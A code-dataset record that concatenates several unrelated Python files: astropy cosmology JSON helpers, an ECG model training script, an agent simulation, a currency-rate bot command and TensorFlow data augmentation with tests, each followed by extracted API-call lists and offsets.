"""Get redshift methods from a cosmology.
Parameters
----------
cosmology : |Cosmology| class or instance
Returns
-------
set[str]
"""
methods = set()
for n in dir(cosmology):
try: # get method, some will error on ABCs
m = getattr(cosmology, n)
except NotImplementedError:
continue
# Add anything callable, optionally excluding private methods.
if callable(m) and (not n.startswith('_') or allow_private):
methods.add(n)
# Sieve out incompatible methods.
# The index to check for redshift depends on whether cosmology is a class
# or instance and does/doesn't include 'self'.
iz1 = 1 if inspect.isclass(cosmology) else 0
for n in tuple(methods):
try:
sig = inspect.signature(getattr(cosmology, n))
except ValueError: # Remove non-introspectable methods.
methods.discard(n)
continue
else:
params = list(sig.parameters.keys())
# Remove non redshift methods:
if len(params) <= iz1: # Check there are enough arguments.
methods.discard(n)
elif len(params) >= iz1 + 1 and not params[iz1].startswith("z"): # First non-self arg is z.
methods.discard(n)
# If methods with 2 z args are not allowed, the following arg is checked.
elif not allow_z2 and (len(params) >= iz1 + 2) and params[iz1 + 1].startswith("z"):
methods.discard(n)
return methods
def read_json(filename, **kwargs):
"""Read JSON.
Parameters
----------
filename : str
**kwargs
Keyword arguments into :meth:`~astropy.cosmology.Cosmology.from_format`
Returns
-------
`~astropy.cosmology.Cosmology` instance
"""
# read
if isinstance(filename, (str, bytes, os.PathLike)):
with open(filename, "r") as file:
data = file.read()
else: # file-like : this also handles errors in dumping
data = filename.read()
mapping = json.loads(data) # parse json mappable to dict
# deserialize Quantity
with u.add_enabled_units(cu.redshift):
for k, v in mapping.items():
if isinstance(v, dict) and "value" in v and "unit" in v:
mapping[k] = u.Quantity(v["value"], v["unit"])
for k, v in mapping.get("meta", {}).items(): # also the metadata
if isinstance(v, dict) and "value" in v and "unit" in v:
mapping["meta"][k] = u.Quantity(v["value"], v["unit"])
return Cosmology.from_format(mapping, **kwargs)
def write_json(cosmology, file, *, overwrite=False):
"""Write Cosmology to JSON.
Parameters
----------
cosmology : `astropy.cosmology.Cosmology` subclass instance
file : path-like or file-like
overwrite : bool (optional, keyword-only)
"""
data = cosmology.to_format("mapping") # start by turning into dict
data["cosmology"] = data["cosmology"].__qualname__
# serialize Quantity
for k, v in data.items():
if isinstance(v, u.Quantity):
data[k] = {"value": v.value.tolist(), "unit": str(v.unit)}
for k, v in data.get("meta", {}).items(): # also serialize the metadata
if isinstance(v, u.Quantity):
data["meta"][k] = {"value": v.value.tolist(), "unit": str(v.unit)}
# check that file exists and whether to overwrite.
if os.path.exists(file) and not overwrite:
raise IOError(f"{file} exists. Set 'overwrite' to write over.")
with open(file, "w") as write_file:
json.dump(data, write_file)
def json_identify(origin, filepath, fileobj, *args, **kwargs):
return filepath is not None and filepath.endswith(".json")
###############################################################################
# FIXTURES
@pytest.fixture
def clean_registry():
# TODO! with monkeypatch instead for thread safety.
ORIGINAL_COSMOLOGY_CLASSES = core._COSMOLOGY_CLASSES
core._COSMOLOGY_CLASSES = {} # set as empty dict
yield core._COSMOLOGY_CLASSES
core._COSMOLOGY_CLASSES = ORIGINAL_COSMOLOGY_CLASSES
|
[
"json.dump",
"astropy.units.Quantity",
"json.loads",
"inspect.isclass",
"os.path.exists",
"astropy.units.add_enabled_units",
"astropy.cosmology.core.Cosmology.from_format"
] |
[((2705, 2721), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (2715, 2721), False, 'import json\n'), ((3219, 3259), 'astropy.cosmology.core.Cosmology.from_format', 'Cosmology.from_format', (['mapping'], {}), '(mapping, **kwargs)\n', (3240, 3259), False, 'from astropy.cosmology.core import Cosmology\n'), ((1371, 1397), 'inspect.isclass', 'inspect.isclass', (['cosmology'], {}), '(cosmology)\n', (1386, 1397), False, 'import inspect\n'), ((2790, 2822), 'astropy.units.add_enabled_units', 'u.add_enabled_units', (['cu.redshift'], {}), '(cu.redshift)\n', (2809, 2822), True, 'import astropy.units as u\n'), ((4079, 4099), 'os.path.exists', 'os.path.exists', (['file'], {}), '(file)\n', (4093, 4099), False, 'import os\n'), ((4239, 4266), 'json.dump', 'json.dump', (['data', 'write_file'], {}), '(data, write_file)\n', (4248, 4266), False, 'import json\n'), ((2959, 2992), 'astropy.units.Quantity', 'u.Quantity', (["v['value']", "v['unit']"], {}), "(v['value'], v['unit'])\n", (2969, 2992), True, 'import astropy.units as u\n'), ((3173, 3206), 'astropy.units.Quantity', 'u.Quantity', (["v['value']", "v['unit']"], {}), "(v['value'], v['unit'])\n", (3183, 3206), True, 'import astropy.units as u\n')]
|
import json
from urllib.parse import quote
from sdk_lpl.config import Config
from sdk_lpl.models.InfoCompteModel import InformationCompteModel
from sdk_lpl.utils.crypt import Crypt
def generate_url(mail, username, guid):
"""
Génération de l'url de l'inscription partenaire
Inclure cette url dans une balise <a> pour rediriger l'utilisateur connecté vers une page d'inscription de la plateforme LPL avec les champs mail et pseudo déjà remplis
:param mail:
:param username:
:param guid:
:return:
"""
model = InformationCompteModel(mail, username, guid)
json_val = json.dumps(model.__dict__)
crypt = Crypt(Config.aes_key, Config.iv)
return "http://www.lapresselibre.fr/inscription-partenaire?user={}&partId={}".format(
quote(crypt.aes_encrypt(json_val)), Config.partenaire_id)
|
[
"sdk_lpl.utils.crypt.Crypt",
"sdk_lpl.models.InfoCompteModel.InformationCompteModel",
"json.dumps"
] |
[((545, 589), 'sdk_lpl.models.InfoCompteModel.InformationCompteModel', 'InformationCompteModel', (['mail', 'username', 'guid'], {}), '(mail, username, guid)\n', (567, 589), False, 'from sdk_lpl.models.InfoCompteModel import InformationCompteModel\n'), ((605, 631), 'json.dumps', 'json.dumps', (['model.__dict__'], {}), '(model.__dict__)\n', (615, 631), False, 'import json\n'), ((644, 676), 'sdk_lpl.utils.crypt.Crypt', 'Crypt', (['Config.aes_key', 'Config.iv'], {}), '(Config.aes_key, Config.iv)\n', (649, 676), False, 'from sdk_lpl.utils.crypt import Crypt\n')]
|
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.callbacks import (ModelCheckpoint, TensorBoard, ReduceLROnPlateau,
CSVLogger, EarlyStopping)
from model import get_model
import argparse
from datasets import ECGSequence, PublicECGSequence
if __name__ == "__main__":
# Get data and train
parser = argparse.ArgumentParser(description='Train neural network.')
# parser.add_argument('path_to_hdf5', type=str,
# help='path to hdf5 file containing tracings')
# parser.add_argument('path_to_csv', type=str,
# help='path to csv file containing annotations')
# parser.add_argument('--val_split', type=float, default=0.02,
# help='number between 0 and 1 determining how much of'
# ' the data is to be used for validation. The remaining '
# 'is used for validation. Default: 0.02')
# parser.add_argument('--dataset_name', type=str, default='tracings',
# help='name of the hdf5 dataset containing tracings')
parser = argparse.ArgumentParser(description='Train neural network.')
parser.add_argument('--path_to_train', type=str, help='path to csv file containing training data')
parser.add_argument('--path_to_ecg', type=str, help='path to folder containing csv of ecg')
parser.add_argument('--val_split', type=float, default=0.2,
help='number between 0 and 1 determining how much of'
' the data is to be used for validation. The remaining '
'is used for validation. Default: 0.2')
# parser.add_argument('--dataset_name', type=str, default='tracings',
# help='name of the hdf5 dataset containing tracings')
args = parser.parse_args()
# Optimization settings
loss = 'binary_crossentropy'
lr = 0.001
batch_size = 64
opt = Adam(lr)
callbacks = [ReduceLROnPlateau(monitor='val_loss',
factor=0.1,
patience=7,
min_lr=lr / 100),
EarlyStopping(patience=9, # Patience should be larger than the one in ReduceLROnPlateau
min_delta=0.00001)]
# train_seq, valid_seq = ECGSequence.get_train_and_val(
# args.path_to_hdf5, args.dataset_name, args.path_to_csv, batch_size, args.val_split)
train_seq, valid_seq = PublicECGSequence.get_train_and_val(
args.path_to_train, args.path_to_ecg, batch_size, args.val_split)
# If you are continuing an interrupted section, uncomment line bellow:
# model = keras.models.load_model(PATH_TO_PREV_MODEL, compile=False)
model = get_model(train_seq.n_classes)
model.compile(loss=loss, optimizer=opt)
# Create log
callbacks += [TensorBoard(log_dir='./logs', write_graph=False),
CSVLogger('training.log', append=False)] # Change append to true if continuing training
# Save the BEST and LAST model
callbacks += [ModelCheckpoint('./backup_model_last.hdf5'),
ModelCheckpoint('./backup_model_best.hdf5', save_best_only=True)]
# Train neural network
history = model.fit(train_seq,
epochs=70,
initial_epoch=0, # If you are continuing a interrupted section change here
callbacks=callbacks,
validation_data=valid_seq,
verbose=1)
# Save final result
model.save("./final_model.hdf5")
|
[
"model.get_model",
"argparse.ArgumentParser",
"tensorflow.keras.callbacks.ReduceLROnPlateau",
"tensorflow.keras.callbacks.ModelCheckpoint",
"tensorflow.keras.callbacks.CSVLogger",
"datasets.PublicECGSequence.get_train_and_val",
"tensorflow.keras.optimizers.Adam",
"tensorflow.keras.callbacks.TensorBoard",
"tensorflow.keras.callbacks.EarlyStopping"
] |
[((362, 422), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train neural network."""'}), "(description='Train neural network.')\n", (385, 422), False, 'import argparse\n'), ((1146, 1206), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train neural network."""'}), "(description='Train neural network.')\n", (1169, 1206), False, 'import argparse\n'), ((1994, 2002), 'tensorflow.keras.optimizers.Adam', 'Adam', (['lr'], {}), '(lr)\n', (1998, 2002), False, 'from tensorflow.keras.optimizers import Adam\n'), ((2545, 2650), 'datasets.PublicECGSequence.get_train_and_val', 'PublicECGSequence.get_train_and_val', (['args.path_to_train', 'args.path_to_ecg', 'batch_size', 'args.val_split'], {}), '(args.path_to_train, args.path_to_ecg,\n batch_size, args.val_split)\n', (2580, 2650), False, 'from datasets import ECGSequence, PublicECGSequence\n'), ((2819, 2849), 'model.get_model', 'get_model', (['train_seq.n_classes'], {}), '(train_seq.n_classes)\n', (2828, 2849), False, 'from model import get_model\n'), ((2020, 2098), 'tensorflow.keras.callbacks.ReduceLROnPlateau', 'ReduceLROnPlateau', ([], {'monitor': '"""val_loss"""', 'factor': '(0.1)', 'patience': '(7)', 'min_lr': '(lr / 100)'}), "(monitor='val_loss', factor=0.1, patience=7, min_lr=lr / 100)\n", (2037, 2098), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((2222, 2264), 'tensorflow.keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'patience': '(9)', 'min_delta': '(1e-05)'}), '(patience=9, min_delta=1e-05)\n', (2235, 2264), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((2929, 2977), 'tensorflow.keras.callbacks.TensorBoard', 'TensorBoard', ([], {'log_dir': '"""./logs"""', 'write_graph': '(False)'}), "(log_dir='./logs', write_graph=False)\n", (2940, 2977), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((2997, 3036), 'tensorflow.keras.callbacks.CSVLogger', 'CSVLogger', (['"""training.log"""'], {'append': '(False)'}), "('training.log', append=False)\n", (3006, 3036), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((3139, 3182), 'tensorflow.keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (['"""./backup_model_last.hdf5"""'], {}), "('./backup_model_last.hdf5')\n", (3154, 3182), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((3202, 3266), 'tensorflow.keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (['"""./backup_model_best.hdf5"""'], {'save_best_only': '(True)'}), "('./backup_model_best.hdf5', save_best_only=True)\n", (3217, 3266), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n')]
|
"""
Agents!
Create a number of Agents, each with a random x and y coordinate (0-99).
Cycle through a number of iteration steps.
For each iteration randomly move the agent by +/- 1 unit in each direction.
The agent must stay within the bounds of the model 0-99.
Calculate the final distance between all the agents.
Plot the final agent positions.
Highlight the two closest Agents and the two furthest Agents
"""
import operator
import matplotlib.pyplot
import agentframework
def distance_between(agents_row_a, agents_row_b):
""" determine distance between two agents """
dy=agents_row_b.y-agents_row_a.y
dx=agents_row_b.x-agents_row_a.x
return((dx**2+dy**2)**0.5)
num_of_agents = 10
num_of_iterations = 100
agents = []
""" Make the agents using the Agent class """
for i in range(num_of_agents):
agents.append(agentframework.Agent())
""" Move the agents using the move method """
for j in range(num_of_iterations):
for i in range(num_of_agents):
agents[i].move()
""" Plot agent locations """
matplotlib.pyplot.ylim(0, 99)
matplotlib.pyplot.xlim(0, 99)
for i in range(num_of_agents):
matplotlib.pyplot.scatter(agents[i].x,agents[i].y,color="blue")
""" Distance between all agents stored in a list, mat[] """
""" Do not include repeated pairings or self pairings """
mat=[]
for i in range(num_of_agents-1):
for j in range(i+1,num_of_agents):
distance=distance_between(agents[i], agents[j])
mat.append([i,j,distance])
""" Maximum and Minimum distance between two agents """
dmax = max(mat, key=operator.itemgetter(2))
dmin = min(mat, key=operator.itemgetter(2))
print("\nmax distance is ",dmax[2],"between agents",dmax[0],"and",dmax[1])
print("\nmin distance is ",dmin[2],"between agents",dmin[0],"and",dmin[1])
""" Plot maximum and minimum pairs """
matplotlib.pyplot.scatter(agents[dmax[0]].x,agents[dmax[0]].y,color="red")
matplotlib.pyplot.scatter(agents[dmax[1]].x,agents[dmax[1]].y,color="red")
matplotlib.pyplot.scatter(agents[dmin[0]].x,agents[dmin[0]].y,color="green")
matplotlib.pyplot.scatter(agents[dmin[1]].x,agents[dmin[1]].y,color="green")
matplotlib.pyplot.show()
|
[
"operator.itemgetter",
"agentframework.Agent"
] |
[((844, 866), 'agentframework.Agent', 'agentframework.Agent', ([], {}), '()\n', (864, 866), False, 'import agentframework\n'), ((1586, 1608), 'operator.itemgetter', 'operator.itemgetter', (['(2)'], {}), '(2)\n', (1605, 1608), False, 'import operator\n'), ((1630, 1652), 'operator.itemgetter', 'operator.itemgetter', (['(2)'], {}), '(2)\n', (1649, 1652), False, 'import operator\n')]
|
import configparser
import random
import os
import requests
from common import doc, set_help, set_aliases, get_aliases
from lxml import etree
config = configparser.ConfigParser()
config.read('config.ini')
BOT_NAME = config['bot']['name']
if config['bot']['cmd_without_dash'] == 'yes':
CMD_SIGN = ''
else:
CMD_SIGN = '-'
URL = 'http://www.cbr.ru/scripts/XML_daily.asp'
def get_available_currencies():
cur_list = []
r = requests.get(URL)
tree = etree.fromstring(r.content)
tree = tree.getroottree()
root = tree.getroot()
for node in root:
cur_list.append(node.find('CharCode').text)
return ' '.join(cur_list)
s = _("""Returns currency rates from Central Bank of Russia (cbr.ru)
Available currencies:
{currencies}
Example usage:
{CMD_SIGN}{BOT_NAME} {first_aliase} USD
{CMD_SIGN}{BOT_NAME} {first_aliase} usd""").format(
first_aliase=get_aliases('cbr_currency')[0],
CMD_SIGN=CMD_SIGN,
BOT_NAME=BOT_NAME,
currencies=get_available_currencies())
@set_aliases(get_aliases('cbr_currency'))
@set_help(s)
def cbr_currency(cmd):
if len(cmd) == 0: return None
if " " in cmd:
currency = cmd.split()[1].strip()
else:
currency = None
if currency:
r = requests.get(URL)
tree = etree.fromstring(r.content)
tree = tree.getroottree()
root = tree.getroot()
msg = _("Exchange rate of ")
for node in root:
if node.find('CharCode').text.lower() == currency.lower():
char_code = node.find('CharCode').text
nominal = node.find('Nominal').text
name = node.find('Name').text
value = node.find('Value').text
return _("""{msg} {char_code}:
{nominal} {name} - {value} RUB""".format(msg=msg,
char_code=char_code, nominal=nominal, name=name, value=value))
err_msg = _("""Unknown currency. Available currencies:
{currencies}""".format(currencies=get_available_currencies()))
return err_msg
else:
return s
|
[
"lxml.etree.fromstring",
"common.get_aliases",
"common.set_help",
"requests.get",
"configparser.ConfigParser"
] |
[((152, 179), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (177, 179), False, 'import configparser\n'), ((1077, 1088), 'common.set_help', 'set_help', (['s'], {}), '(s)\n', (1085, 1088), False, 'from common import doc, set_help, set_aliases, get_aliases\n'), ((438, 455), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (450, 455), False, 'import requests\n'), ((467, 494), 'lxml.etree.fromstring', 'etree.fromstring', (['r.content'], {}), '(r.content)\n', (483, 494), False, 'from lxml import etree\n'), ((1047, 1074), 'common.get_aliases', 'get_aliases', (['"""cbr_currency"""'], {}), "('cbr_currency')\n", (1058, 1074), False, 'from common import doc, set_help, set_aliases, get_aliases\n'), ((1271, 1288), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (1283, 1288), False, 'import requests\n'), ((1304, 1331), 'lxml.etree.fromstring', 'etree.fromstring', (['r.content'], {}), '(r.content)\n', (1320, 1331), False, 'from lxml import etree\n'), ((901, 928), 'common.get_aliases', 'get_aliases', (['"""cbr_currency"""'], {}), "('cbr_currency')\n", (912, 928), False, 'from common import doc, set_help, set_aliases, get_aliases\n')]
|
import tensorflow as tf
from utils.util_class import WrongInputException
def augmentation_factory(augment_probs=None):
augment_probs = augment_probs if augment_probs else dict()
augmenters = []
for key, prob in augment_probs.items():
if key is "CropAndResize":
augm = CropAndResize(prob)
elif key is "HorizontalFlip":
augm = HorizontalFlip(prob)
elif key is "ColorJitter":
augm = ColorJitter(prob)
else:
raise WrongInputException(f"Wrong augmentation type: {key}")
augmenters.append(augm)
total_augment = TotalAugment(augmenters)
return total_augment
class TotalAugment:
def __init__(self, augment_objects=None):
self.augment_objects = augment_objects
def __call__(self, features):
feat_aug = self.preprocess(features)
for augmenter in self.augment_objects:
feat_aug = augmenter(feat_aug)
feat_aug = self.postprocess(features, feat_aug)
return feat_aug
def preprocess(self, features):
"""
!!NOTE!!
when changing input dict's key or value, you MUST copy a dict like
feat_aug = {key: val for key, val in features.items()}
"""
# create a new feature dict
feat_aug = {key: val for key, val in features.items() if "image5d" not in key}
# to use tf.image functions, reshape to [batch*snippet, height, width, 3]
batch, snippet, height, width, channels = features["image5d"].get_shape()
imshape = (batch * snippet, height, width, channels)
feat_aug["image5d"] = tf.reshape(features["image5d"], imshape)
if "image5d_R" in features:
feat_aug["image5d_R"] = tf.reshape(features["image5d_R"], imshape)
return feat_aug
def postprocess(self, features, feat_aug):
image5d = features["image5d"]
feat_aug["image5d"] = tf.reshape(feat_aug["image5d"], image5d.get_shape())
if "image5d_R" in feat_aug:
feat_aug["image5d_R"] = tf.reshape(feat_aug["image5d_R"], image5d.get_shape())
return feat_aug
class AugmentBase:
def __init__(self, aug_prob=0.):
self.aug_prob = aug_prob
self.param = 0
def __call__(self, features):
raise NotImplementedError()
class CropAndResize(AugmentBase):
"""
randomly crop "image5d" and resize it to original size
create "intrinsic_aug" as camera matrix for "image5d"
"""
def __init__(self, aug_prob=0.3):
super().__init__(aug_prob)
self.half_crop_ratio = 0.1
def __call__(self, features):
nimage, height, width, _ = features["image5d"].get_shape()
crop_size = tf.constant([height, width])
box_indices = tf.range(0, nimage)
boxes = self.random_crop_boxes(nimage)
self.param = boxes[0]
features["image5d"] = tf.image.crop_and_resize(features["image5d"], boxes, box_indices, crop_size)
features["intrinsic"] = self.adjust_intrinsic(features["intrinsic"], boxes, crop_size)
if "image5d_R" in features:
features["image5d_R"] = tf.image.crop_and_resize(features["image5d_R"], boxes, box_indices, crop_size)
features["intrinsic_R"] = self.adjust_intrinsic(features["intrinsic_R"], boxes, crop_size)
if "depth_gt" in features:
batch = features["depth_gt"].get_shape()[0]
features["depth_gt"] = tf.image.crop_and_resize(features["depth_gt"], boxes[:batch], box_indices[:batch],
crop_size, method="nearest")
return features
def random_crop_boxes(self, num_box):
# aug_prob : 1-aug_prob = half_crop_ratio : minval1
maxval1 = self.half_crop_ratio
minval1 = -(1. - self.aug_prob) * self.half_crop_ratio / self.aug_prob
y1x1 = tf.random.uniform((1, 2), minval1, maxval1)
y1x1 = tf.clip_by_value(y1x1, 0, 1)
minval2 = 1. - maxval1
maxval2 = 1. - minval1
y2x2 = tf.random.uniform((1, 2), minval2, maxval2)
y2x2 = tf.clip_by_value(y2x2, 0, 1)
assert (minval1 < maxval1) and (minval2 < maxval2)
# boxes: [1, 4]
boxes = tf.concat([y1x1, y2x2], axis=1)
# boxes: [num_box, 4]
boxes = tf.tile(boxes, [num_box, 1])
return boxes
def adjust_intrinsic(self, intrinsic, boxes, imsize):
"""
:param intrinsic: [batch, 3, 3]
:param boxes: (y1,x1,y2,x2) in range [0~1] [batch, 4]
:param imsize: [height, width] [2]
:return: adjusted intrinsic [batch, 3, 3]
"""
imsize = tf.cast(imsize, tf.float32)
# size: [1, 3, 3], contents: [[0, 0, x1_ratio*width], [0, 0, y1_ratio*height], [0, 0, 0]]
center_change = tf.stack([tf.stack([0., 0., boxes[0, 1]*imsize[1]], axis=0),
tf.stack([0., 0., boxes[0, 0]*imsize[0]], axis=0),
tf.stack([0., 0., 0.], axis=0)], axis=0)
# cx'=cx-x1, cy'=cy-y1
intrin_crop = intrinsic - center_change
# cx,fx *= W/(x2-x1), cy,fy *= H/(y2-y1)
x_ratio = 1. / (boxes[0, 3] - boxes[0, 1])
y_ratio = 1. / (boxes[0, 2] - boxes[0, 0])
intrin_adj = tf.stack([intrin_crop[:, 0] * x_ratio, intrin_crop[:, 1] * y_ratio, intrin_crop[:, 2]], axis=1)
return intrin_adj
class HorizontalFlip(AugmentBase):
"""
randomly horizontally flip "image5d" by aug_prob
"""
def __init__(self, aug_prob=0.2):
super().__init__(aug_prob)
def __call__(self, features):
rndval = tf.random.uniform(())
features = tf.cond(rndval < self.aug_prob,
lambda: self.flip_features(features),
lambda: features
)
return features
def flip_features(self, features):
feat_aug = dict()
feat_aug["image5d"] = tf.image.flip_left_right(features["image5d"])
if "image5d_R" in features:
feat_aug["image5d_R"] = tf.image.flip_left_right(features["image5d_R"])
feat_aug["intrinsic"] = self.flip_intrinsic(features["intrinsic"], features["image5d"].get_shape())
if "intrinsic_R" in features:
feat_aug["intrinsic_R"] = self.flip_intrinsic(features["intrinsic_R"], features["image5d"].get_shape())
if "pose_gt" in features:
feat_aug["pose_gt"] = self.flip_gt_pose(features["pose_gt"])
if "pose_gt_R" in features:
feat_aug["pose_gt_R"] = self.flip_gt_pose(features["pose_gt_R"])
if "stereo_T_LR" in features:
feat_aug["stereo_T_LR"] = self.flip_stereo_pose(features["stereo_T_LR"])
feat_rest = {key: val for key, val in features.items() if key not in feat_aug}
feat_aug.update(feat_rest)
return feat_aug
def flip_intrinsic(self, intrinsic, imshape):
batch, height, width, _ = imshape
intrin_wh = tf.constant([[[0, 0, width], [0, 0, 0], [0, 0, 0]]], dtype=tf.float32)
intrin_flip = tf.abs(intrin_wh - intrinsic)
return intrin_flip
def flip_gt_pose(self, pose):
T_flip = tf.constant([[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]], dtype=tf.float32)
# [batch, numsrc, 4, 4] = [1, 1, 4, 4] @ [batch, numsrc, 4, 4] @ [1, 1, 4, 4]
pose_flip = T_flip @ pose @ tf.linalg.inv(T_flip)
return pose_flip
def flip_stereo_pose(self, pose):
T_flip = tf.constant([[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]], dtype=tf.float32)
# [batch, 4, 4] = [1, 4, 4] @ [batch, 4, 4] @ [1, 4, 4]
pose_flip = T_flip @ pose @ tf.linalg.inv(T_flip)
return pose_flip
class ColorJitter(AugmentBase):
def __init__(self, aug_prob=0.2):
super().__init__(aug_prob)
def __call__(self, features):
rndval = tf.random.uniform(())
gamma = tf.random.uniform((), minval=0.5, maxval=1.5)
saturation = tf.random.uniform((), minval=0.5, maxval=1.5)
features["image5d"], self.param = \
tf.cond(rndval < self.aug_prob,
lambda: self.jitter_color(features["image5d"], gamma, saturation),
lambda: (features["image5d"], tf.constant([0, 0], dtype=tf.float32))
)
if "image5d_R" in features:
features["image5d_R"], self.param = \
tf.cond(rndval < self.aug_prob,
lambda: self.jitter_color(features["image5d_R"], gamma, saturation),
lambda: (features["image5d_R"], tf.constant([0, 0], dtype=tf.float32))
)
return features
def jitter_color(self, image, gamma, saturation):
# convert image -1 ~ 1 to 0 ~ 1
image = (image + 1.) / 2.
image = tf.image.adjust_saturation(image, saturation)
image = tf.image.adjust_gamma(image, gamma=gamma, gain=1.)
# convert image 0 ~ 1 to -1 ~ 1
image = image * 2. - 1.
param = tf.stack([gamma, saturation], axis=0)
return image, param
# ---------------------------------
import numpy as np
import utils.convert_pose as cp
def test_random_crop_boxes():
print("===== test test_random_crop_boxes")
cropper = CropAndResize()
boxes = cropper.random_crop_boxes(4)
print("boxes:", boxes)
wh = boxes[:, 2:] - boxes[:, :2]
assert (wh.numpy() > cropper.half_crop_ratio*2).all()
print("!!! test_random_crop_boxes passed")
def test_adjust_intrinsic():
print("===== test test_adjust_intrinsic")
batch, height, width = 3, 200, 240
imsize = tf.constant([height, width], dtype=tf.float32)
intrinsic = tf.constant([[[width/2, 0, width/2], [0, height/2, height/2], [0, 0, 1]]], dtype=tf.float32)
intrinsic = tf.tile(intrinsic, [batch, 1, 1])
print("intrinsic original", intrinsic[0])
xcrop, ycrop = 0.05, 0.1
cropper = CropAndResize()
boxes = tf.tile(tf.constant([[ycrop, xcrop, 1-ycrop, 1-xcrop]]), [batch, 1])
print("crop box:", boxes[0])
# EXECUTE
intrin_adj = cropper.adjust_intrinsic(intrinsic, boxes, imsize)
print("intrinsic adjusted", intrin_adj[0])
assert np.isclose(intrin_adj.numpy()[0], intrin_adj.numpy()[-1]).all()
assert np.isclose(intrin_adj[0, 0, 0], width / 2 / (1 - 2*xcrop)), \
f"fx={intrin_adj[0, 0, 0]}, expected={width / 2 / (1 - 2*xcrop)}"
assert np.isclose(intrin_adj[0, 0, 2], width / 2), \
f"cx={intrin_adj[0, 0, 2]}, expected={width / 2}"
print("!!! test_adjust_intrinsic passed")
def test_flip_pose_np():
print("===== test test_flip_pose_np")
batch = 2
pose_vec = np.random.uniform(-2, 2, (batch, 6))
pose_mat = cp.pose_rvec2matr(pose_vec)
flip = np.identity(4)
flip[0, 0] = -1
flip = flip[np.newaxis, ...]
pose_mat_flip = np.matmul(np.matmul(flip, pose_mat), np.linalg.inv(flip))
pose_vec_flip = cp.pose_matr2rvec(pose_mat_flip)
print("pose vec:\n", pose_vec)
print("pose mat:\n", pose_mat)
print("pose mat flip:\n", pose_mat_flip)
print("pose vec flip:\n", pose_vec_flip)
print("pose vec rotation: (rad)\n", np.linalg.norm(pose_vec[:, 3:], axis=1))
print("pose vec flip rotation: (rad)\n", np.linalg.norm(pose_vec_flip[:, 3:], axis=1))
print("pose == pose_flip:\n", np.isclose(pose_vec, pose_vec_flip))
flip_vec = np.array([[-1, 1, 1, 1, -1, -1]], dtype=np.float32)
assert np.isclose(pose_vec, pose_vec_flip*flip_vec).all()
print("!!! test_flip_pose_np passed")
def test_flip_pose_tf():
print("===== test test_flip_pose_tf")
batch, numsrc = 2, 2
pose_vec = tf.random.uniform((batch, numsrc, 6), -2, 2)
pose_mat = cp.pose_rvec2matr_batch_tf(pose_vec)
flipper = HorizontalFlip()
pose_mat_flip = flipper.flip_gt_pose(pose_mat)
pose_vec_flip = cp.pose_matr2rvec_batch(pose_mat_flip)
print("pose vec:\n", pose_vec[1])
print("pose mat:\n", pose_mat[1, 1])
print("pose mat flip:\n", pose_mat_flip[1, 1])
print("pose vec flip:\n", pose_vec_flip[1])
print("pose vec rotation [batch, numsrc]: (rad)\n", np.linalg.norm(pose_vec[:, :, 3:], axis=1))
print("pose vec flip rotation [batch, numsrc]: (rad)\n", np.linalg.norm(pose_vec_flip[:, :, 3:], axis=1))
print("pose == pose_flip:\n", np.isclose(pose_vec[1, 1], pose_vec_flip[1, 1]))
flip_vec = tf.constant([[[[-1, 1, 1, 1, -1, -1]]]], dtype=tf.float32)
assert np.isclose(pose_vec.numpy(), pose_vec_flip.numpy()*flip_vec, atol=1.e-3).all(), \
f"{pose_vec.numpy() - pose_vec_flip.numpy()*flip_vec}"
print("!!! test_flip_pose_tf passed")
def test_flip_intrinsic():
print("===== test test_flip_intrinsic")
batch, height, width = 3, 200, 240
intrinsic = tf.random.uniform((batch, 3, 3), minval=100, maxval=200)
print("intrinsic original", intrinsic[0])
imshape = (batch, height, width, 3)
flipper = HorizontalFlip()
# EXECUTE
intrin_flip = flipper.flip_intrinsic(intrinsic, imshape)
intrinsic = intrinsic.numpy()
intrin_flip = intrin_flip.numpy()
# fy, cy: SAME
assert np.isclose(intrinsic[:, 1:], intrin_flip[:, 1:]).all(), \
f"original\n{intrinsic[:, 1:]}\nflipped\n{intrin_flip[:, 1:]}"
# fx: SAME
assert np.isclose(intrinsic[:, 0, :2], intrin_flip[:, 0, :2]).all(), \
f"original\n{intrinsic[:, 0, :2]}\nflipped\n{intrin_flip[:, 0, :2]}"
# cx <- W - cx
assert np.isclose(width - intrinsic[:, 0, 2], intrin_flip[:, 0, 2]).all(), \
f"original\n{intrinsic[:, 0, 2]}\nflipped\n{intrin_flip[:, 0, 2]}"
print("horizontally flipped intrinsic\n", intrin_flip[0])
print("!!! test_flip_intrinsic passed")
import os.path as op
import cv2
from config import opts
from tfrecords.tfrecord_reader import TfrecordReader
from utils.util_funcs import to_uint8_image, multi_scale_depths
from model.synthesize.synthesize_base import SynthesizeMultiScale
from utils.convert_pose import pose_matr2rvec_batch
def test_augmentations():
print("===== test test_augmentations")
tfrgen = TfrecordReader(op.join(opts.DATAPATH_TFR, "kitti_raw_test"), shuffle=False)
dataset = tfrgen.get_dataset()
total_aug = TotalAugment()
data_aug = {"CropAndResize": CropAndResize(aug_prob=0.5),
"HorizontalFlip": HorizontalFlip(aug_prob=0.5),
"ColorJitter": ColorJitter(aug_prob=0.5)}
